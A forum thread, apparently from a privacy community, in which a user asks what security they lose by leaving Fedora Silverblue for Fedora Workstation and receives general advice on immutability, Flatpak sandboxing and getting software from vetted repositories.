Hi, it’s my first post!
Over the past year I have used FedoraOS as my daily driver for some months, and then SilverBlue for a short while. It gave me some peace of mind as a casual user knowing the SilverBlue OS can’t be tampered with. I do a lot of artistic projects and I was enjoying many of the flatpak creative applications, but I found SilverBlue somewhat slows down my workflow with compatibility issues and some lack of availability. Rather than ending up back on Windows, I have been thinking to switch back to vanilla Fedora for a more casual experience where I can experiment with Linux software. However I’m wondering, how much security I would be sacrificing by not using an immutable OS? I’m trying to properly weigh the risks and benefits but I feel like I don’t know enough about the differences between the two.
What have you considered or looked at already?
I’ve read various comparisons and watched reviews on both SilverBlue and Fedora in relation to privacy. I’ve also tried them both out to an extent where I noticed some of the differences between them.
In brief, tell us about your privacy threat model?
I want nearly all of my information and identifiers to stay offline except my creative work and related aliases, I want to keep them separated from my real life. I don’t want my family and friends to be tracked or identified due to my computer usage, or for my personal and work files to be stolen or destroyed.
The main difference that comes from using Silverblue over Fedora is the immutability. Because Silverblue is immutable, it means you can’t rely on regular packages that would make changes to your system, and that’s why that spin depends on flatpaks. Flatpaks have their sandboxing component, but more importantly they come bundled with all of the dependencies the application will need. They don’t need to make changes to the system in order to run.
What you’re losing by switching back to Fedora Workstation will mainly be the immutability, meaning that software will once again be able to write to your system. You’d also lose the ability to quickly switch between different images of your system in case an update causes you problems, but I doubt you’ve run into a need for that, and it can be protected against with regular backups. Otherwise, it’s the same old Fedora and application availability should be the same.
Is that a risk to lose such a good feature? Yes, but not for most threat models. It would be amazing to continue to run an immutable system. Hopefully that will be the standard flagship distro soon. For what you’re focusing on of trying to keep private on the internet, this feature does nothing for you. The main place it’s helpful is protecting against malware, in which case you are technically weakening your security.
In my opinion, I think you’re fine to move to Fedora Workstation.
Thank you for the warm welcome! And thanks for your answer, you actually touched on something I was wondering about. If I want to prevent malware also, are there any steps I should follow? I generally have always backed up my files separate of my PC in case of a complete meltdown in the drive, and I am always careful of the sites I download from. I know Linux is not free of viruses but I chose Fedora because I got the notion it is a bit less likely to have those kinds of issues, but I don’t know what to actually do in the case of a malware.
Other than that, looking at what you said, I’m hoping that I can be careful and give vanilla Fedora a second chance, to see if I can create a workflow the same as or better than what I had on Windows. Apps like Krita are amazing in terms of FOSS, I even got my friend using it!
Follow general cybersecurity tips. Don’t run random scripts from the internet, install only what you need, follow principle of least privilege etc. Malware for Linux is really easy to make, so just be extra careful.
Thanks for the advice. I’m hoping if I use it in the same way that I have used Windows (downloading from apps and websites that are well-known to me or friends, checking the general response from users and system requirements of apps, keeping installs to a minimum) that nothing in particular will be able to get in. Right now I just want to try and replicate my Windows experience to make it a worthwhile long-term driver instead of something I have to remind myself to use.
Linux has centralized repos so I am afraid your experience is going to be much defferent than Windows. Appimages do exist, and you can download them from websites like you download executables on Windows, but they don’t integrate well to your system and is in general less secure than something like Flatpak. Since you are on Fedora, using Flatpak might be the way to go. You can download Flatpak apps from gnome software app or on Discover app on KDE.
For sure be on the lookout for apps that you already know and trust first, but I would try searching first in Gnome Software, which connects to Fedora’s repos. Those specific builds have been reviewed by the Fedora community and are coming from Fedora infrastructure. With downloading apps directly from websites (1) you may run into availability problems and (2) you’re trust that the website itself hasn’t be compromised. Is it unlikely that Discord’s website will send you malware? Highly. But the software center would be a more secure way of getting those apps.
Even if you do want to go straight to the source for some apps, I would at least use the software center for apps you’re not as familiar with. For example, if you want to do video editing and need a substitute for Adobe Premiere, don’t just download an alternative from any old site. Go with the builds that Fedora provides because those have been vetted.
